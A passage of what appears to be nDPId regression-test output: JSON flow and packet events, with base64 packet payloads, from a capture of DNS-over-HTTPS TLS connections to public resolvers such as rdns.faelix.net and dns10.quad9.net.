NWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmn
MdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jd
G+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} 
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD
9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zN
uwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R8
8DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 